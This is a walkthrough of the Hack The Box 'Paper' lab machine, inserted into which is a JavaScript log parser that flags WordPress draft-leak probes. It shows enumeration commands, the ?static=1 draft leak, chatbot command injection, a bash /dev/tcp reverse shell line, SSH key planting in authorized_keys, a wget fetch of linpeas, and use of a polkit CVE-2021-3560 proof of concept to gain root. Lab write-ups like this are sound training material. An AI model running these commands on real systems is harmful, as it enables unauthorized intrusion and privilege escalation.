WALK THROUGH: HACK THE BOX: PAPER

Paper was written by Secnigma and is an homage to one of the greatest TV series of all time, The Office! Enumeration (like most things) is key to rooting this box. Enumeration using various tools is important to gain the initial foothold. Next, enumeration of a WordPress site gives you access to secret information. Using this secret information, you gain access to an application that, with some googling, you can use to get your user-level reverse shell. More enumeration of the box shows that it is vulnerable to CVE-2021-3560, for which our author has generously provided a proof of concept on their GitHub.

Initial Enumeration

Right off the bat, we need to start our enumeration of the box, so I start off with an nmap scan:

nmap -sC -sV -oA nmap/paper 10.10.11.143

Initial nmap scan

We see that there are three ports open: ssh, http, and https. Let’s go take a look at the websites.

Test page when navigating to 10.10.11.143 on port 80 and 443

There doesn’t seem to be anything too interesting on this page, and there is nothing of interest in the source code. I tried a gobuster scan with the following command, but didn’t get a hit.

gobuster dir -u http://10.10.11.143 -w /opt/seclists/Discovery/Web-Content/raft-small-words.txt

Back to the drawing board. We know that this is a website and that there are other tools to analyze a website. So let’s give Nikto a chance and see if anything different comes up.

nikto -host http://10.10.11.143

Nikto shows us a host name of office.paper

Bingo! Our Nikto scan shows us a host name of office.paper. We add that to our /etc/hosts file and take a look at office.paper.

A WordPress site with posts and comments from prisonmike, Creed Bratton, and Nick!

We find a really fun homage to one of the greatest TV shows ever, The Office! At the Blunder Tiffin blog, we see a few blog posts from prisonmike. After examining a few of his posts and the comments, we see a nugget of information that may be able to help us!

Uh-oh! Michael has been putting secret content into his drafts! Let’s see if we can exploit that…

Apparently Michael has been putting secrets into his drafts and Nick has told us that isn’t secure. Let’s use another tool, WPScan, to see if anything comes up.

wpscan --url http://office.paper --api-token <INSERT YOUR API TOKEN HERE>

One thing to note: WPScan requires an API token in order to show vulnerability information. Create an account at https://wpscan.com/ in order to get your API token.

WPScan shows us 32 vulnerabilities, including a vulnerability to view draft posts

We are in luck! This version of WordPress is vulnerable to unauthenticated view of draft posts! You can go to this website to get a very in-depth write up of the vulnerability: https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/. To summarize it for our purposes, you just have to add ?static=1 to the end of the website in order to leak the secret info. Let’s give it a try.
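From the defender's side, the probe described above is easy to spot in web server logs: it is a plain GET with a static=1 query parameter against the WordPress front page. The following is an added example, not part of the original write-up, that parses Combined Log Format lines and flags such requests. The log lines are constructed for the demo (they are not captured from the box), and the names SAMPLE_LOG, parseLine, isDraftLeakProbe, findDraftLeakProbes and summarizeByIp are my own.

```javascript
// Added example (not from the original write-up): flag requests in a web
// access log that look like probes for the WordPress 5.2.3 draft-view leak,
// i.e. a static=1 query parameter on a WordPress host.
// The log lines below are constructed for the demo, not captured from the box.
const SAMPLE_LOG = [
  '10.10.14.5 - - [01/Mar/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
  '10.10.14.5 - - [01/Mar/2022:10:01:09 +0000] "GET /?static=1 HTTP/1.1" 200 8841 "-" "Mozilla/5.0"',
  '10.10.14.5 - - [01/Mar/2022:10:01:15 +0000] "GET /?static=1&order=asc HTTP/1.1" 200 8841 "-" "curl/7.81.0"',
  '10.10.14.7 - - [01/Mar/2022:10:02:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4012 "-" "Mozilla/5.0"',
  '10.10.14.9 - - [01/Mar/2022:10:03:00 +0000] "GET /static/logo.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
];

// Combined Log Format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "ua"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null; // not a log line we understand; skip it
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]), ua: m[6] };
}

// A request is a draft-leak probe when its parsed query string carries static=1.
// Checking the parsed query (not a substring) keeps /static/logo.png from matching.
function isDraftLeakProbe(entry) {
  try {
    // The base URL is only there so a relative request path can be parsed.
    const url = new URL(entry.path, 'http://placeholder.invalid');
    return url.searchParams.get('static') === '1';
  } catch {
    return false; // malformed path; nothing to flag
  }
}

function findDraftLeakProbes(lines) {
  return lines.map(parseLine).filter(Boolean).filter(isDraftLeakProbe);
}

// Group hits by source IP so the analyst sees who probed and how often.
function summarizeByIp(lines) {
  const counts = {};
  for (const e of findDraftLeakProbes(lines)) {
    counts[e.ip] = (counts[e.ip] || 0) + 1;
  }
  return counts;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const e of findDraftLeakProbes(SAMPLE_LOG)) {
    console.log(`${e.time} ${e.ip} ${e.method} ${e.path} -> ${e.status} (${e.ua})`);
  }
  console.log(summarizeByIp(SAMPLE_LOG));
}
```

A 200 response on a flagged line means the server answered the request; whether draft content was actually returned depends on the WordPress version, so the real fix is patching past 5.2.3 rather than only watching for the probe.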

Michael tells us that we can access a private chat system!

Success! Michael inadvertently tells us that we can register for a secret chat service at this address: http://chat.office.paper/register/8qozr226AhkCHZdyY

Let’s add the chat.office.paper subdomain to our /etc/hosts and keep going!

Getting Remote Code Execution and the User Flag

Michael has created an employee chat system with RocketChat

We navigate to the address and find a RocketChat registration page. We can self-register and log into the app.

A chat room with our favorite characters from The Office!

We are able to navigate through a read-only chat log that tells us that Dwight created a bot called recyclops to help answer questions. We can create a one-on-one chat with recyclops and see what he can tell us. With the “recyclops help” command, recyclops tells us that he can engage in small talk, tell us a joke, list all the files in the sales directory, cat out a file in the sales directory, and tell us the time. However, the ability to execute commands is not limited to the sales directory as intended, and we can list the contents of directories and cat files across the system! Unfortunately this doesn’t work for user.txt, so we have to get onto the system to get that flag.

Recyclops is not as secure as Dwight thinks…

I was not familiar with RocketChat, so I did some googling to learn about the chatbot. This website told me that hubot was the name of the bot, which we can see in Dwight’s directory: https://developer.rocket.chat/bots/bots-development-environment-setup. After digging around the hubot directory, we see that the bot’s commands are all in the scripts directory. We do some digging into the scripts and we see this in cmd.coffee.

Not very secure indeed…

This tells us that we have remote code execution by typing “recyclops cmd <insert command>”. We can either set up a remote listener with netcat and get a reverse shell as hubot, or we can create an ssh key and echo the public key into Dwight’s authorized_keys file.

Option 1: Netcat

First, we set up a listener with: nc -nvlp PORT

Then we use the following recyclops command in order to get a reverse shell:

recyclops cmd bash -i >& /dev/tcp/<YOUR IP ADDRESS>/<LISTENING PORT> 0>&1

Option 2: SSH

I created an ssh directory to work in. Using ssh-keygen, I created a private/public SSH key pair called “dwight” and copied the contents of dwight.pub.

Then, I used recyclops to insert the public key into the authorized_keys file like so:

recyclops cmd echo "<YOUR NEW PUBLIC KEY>" > /home/dwight/.ssh/authorized_keys

Once that is complete, I SSH into the machine with

ssh -i dwight dwight@10.10.11.143

I chose to go with option 2 and was able to read our user flag!

We have the user flag!

Privilege Escalation to Root

Since I am on a public version of the box, I decided to go into the /tmp directory and create my own directory so that I’m not leaving a mess or hints for others. Now, I need to do some more enumeration. To do this, I want to get linpeas onto the box. After moving a copy of linpeas into my current working directory on my own machine, I set up a Python web server with

python3 -m http.server <PORT>

On the target machine, I simply wget the file with

wget http://<IP>:<PORT>/linpeas.sh

I edit the permissions with chmod +x linpeas.sh and then run linpeas.

linpeas tells us this machine is vulnerable to CVE-2021-3560

Based on the timing of this box’s release, this is very likely the escalation method we need to use to get root. CVE-2021-3560 is a vulnerability in polkit version 0.113 or later. Through mishandling of an error, an attacker can bypass authentication requirements and gain root level permissions. I am definitely not an expert in this, so check out this article to learn all about this vulnerability: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/.

It just so happens that the author of our machine has also created a PoC and does an excellent job of summarizing the flaws in polkit that allow this escalation of privileges, which can be found here: https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation.

I copied the raw code in poc.sh onto the target machine and ran it. It took a few tries (which was to be expected based on the output from the script), and it created a username of secnigma with a password of secnigmaftw.

Rooted!

With the successful creation of our new account, we can execute sudo bash in order to get root level permissions! We cat root.txt and have successfully owned this box!
